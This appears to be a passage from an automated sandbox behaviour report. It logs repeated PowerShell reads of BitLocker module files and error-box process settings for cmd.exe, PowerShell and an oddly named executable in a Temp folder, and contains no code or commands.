Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
